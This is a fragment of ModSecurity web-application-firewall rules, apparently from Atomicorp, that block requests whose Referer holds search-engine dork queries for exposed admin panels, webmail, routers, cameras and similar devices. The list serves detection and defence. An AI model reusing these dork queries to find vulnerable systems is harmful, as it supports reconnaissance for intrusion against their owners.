+SecRule REQUEST_HEADERS:Referer   "intitle:member login note: your browser must have cookies enabled in order to log into the site\. ext:php or ext:cgi" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371756,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:welcome to mailtraq webmail" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371758,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:topdesk applicationserver" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371759,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:login to cacti" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371762,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "allintitle:welcome to the cyclades" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371766,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:site administration: please log in site designed by emarketsouth" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371774,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:sfxadmin - sfx_global \| intitle:sfxadmin - sfx_local \| intitle:sfxadmin - sfx_test" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371777,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:inc\. vpn 3000 concentrator" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371781,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:asterisk\.management\.portal web-access" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371786,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:listmail login admin -demo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371787,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "ext:cgi  intitle:control panel enter your owner password to continue!" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371788,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:suse linux openexchange server please activate javascript!" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371794,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:bok intitle:kurant corporation storesense" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371795,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:opengroupware\.org resistance is obsolete report bugs username password" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371797,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:welcome to netware \* -site:novell\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371799,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:group-office enter your username and password to login" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371800,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:epowerswitch login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371802,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:vnc viewer for java" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371809,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:athens authentication point" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371814,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:mx control console if you can't remember" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371818,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:vitalqip ip management" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371821,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:phppgadmin - login language" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371826,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:icecast administration admin page" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371828,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:php icalendar administration -site:sourceforge\.net" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371830,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:php icalendar administration -site:sourceforge\.net" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371831,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:ispman : unauthorized access prohibited" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371837,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:virtual server administration system" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371839,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "imail server web messaging intitle:login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371843,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:remote assessment openaanval console" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371844,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:philex 0\.2\* -script -site:freelists\.org" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371846,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:mailman login   " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371848,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "admin intitle:ez publish administration" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371855,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:tomcat server administration" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371856,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:tutos login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371859,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:novell webaccess" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371862,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:login 1&1 webmailer" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371864,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:its system information please log on to the sap system" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371866,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:please login your password is \*" "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371870,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:teamspeak server-administration" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371873,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:node\.list win32\.version\.3\.11" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371876,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:\.?php login \(intitle:phpwebmail\|webmail\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371880,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:welcome site/user administrator please select the language -demos" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371885,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:zyxel prestige router enter password " "phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371886,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:dell remote access controller" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371890,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:mikrotik routeros managing webpage " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371899,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:coldfusion administrator login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371905,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:retina report confidential information" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371924,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:phpbttracker statistics \| intitle:phpbt tracker statistics" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371932,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:bnbt tracker info" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371933,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:start\.managing\.the\.device remote pbx access " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371937,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "site:netcraft\.com intitle:that\.site\.running apache" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371959,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:microsoft site server analysis" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371963,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:adsl configuration page" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371967,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:nessus scan report this file was generated by nessus " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371974,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:uploader - uploader v6 -pixloads\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371984,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:horde :: my portal -\[tickets" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371986,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "filetype:pl intitle:ultraboard setup" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371988,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:xoops custom installation" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371990,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:mail server cmailserver webmail 5\.2" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:371998,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:phpmyadmin welcome to phpmyadmin \*\*\* running on \* as root@\*" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372004,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:gateway configuration menu" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372015,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "select a database to view intitle:filemaker pro" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372019,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:remote desktop web connection" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372025,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:terminal services web connection" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372026,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:gallery in configuration mode" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372029,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "allintitle:syncthru web service" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372035,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:net2phone init page" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372038,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:your network device status \(lan \| wan\)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372039,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "allintitle:dvr login" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372044,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:stingray fts login \| \( login\.jsp intitle:stingray \)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372045,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:bluenet video viewer" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372046,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "allintitle: axis 2\.10 or 2\.12 or 2\.30 or 2\.31 or 2\.32 or 2\.33 or 2\.34 or 2\.40 or 2\.42 or 2\.43 network camera " "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372047,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:divar web client" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372049,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "allintitle:  edr400 login \| welcome" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372050,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "allintitle:  edr1600 login \| welcome" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372051,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "allintitle:edr1680 remote viewer" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372052,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "allintitle: everfocus \| edsr \| edsr400 applet" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372053,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:snc-rz30 home -demo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372054,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:iguard fingerprint security system -ihackstuff" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372058,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:device status summary page -demo" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372059,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:ivc control panel" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372061,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:edr1680 remote viewer" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372062,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:dvr client -the -free -pdf -downloads -blog -download -dvrtop" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372064,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:gigadrive utility" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372065,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:ethernet network attached storage  utility" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372066,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:skystream networks edge media router -securitytracker\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372067,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:wxgoos- \(camera image\|60 seconds \)" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372070,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:ar-\* browser of frame dealing is necessary" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372071,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:webview logon page" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372072,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:snap server intitle:home active users" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372081,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "display cameras intitle:express6 live image" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372083,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:iomega nas manager -ihackstuff\.com" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372084,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
+SecRule REQUEST_HEADERS:Referer   "intitle:cisco you are using an old browser or have disabled javascript\. you must use version 4 or higher of netscape navigator/communicator" "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:372085,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Vulnerable App Search Engine Recon Attempt'"
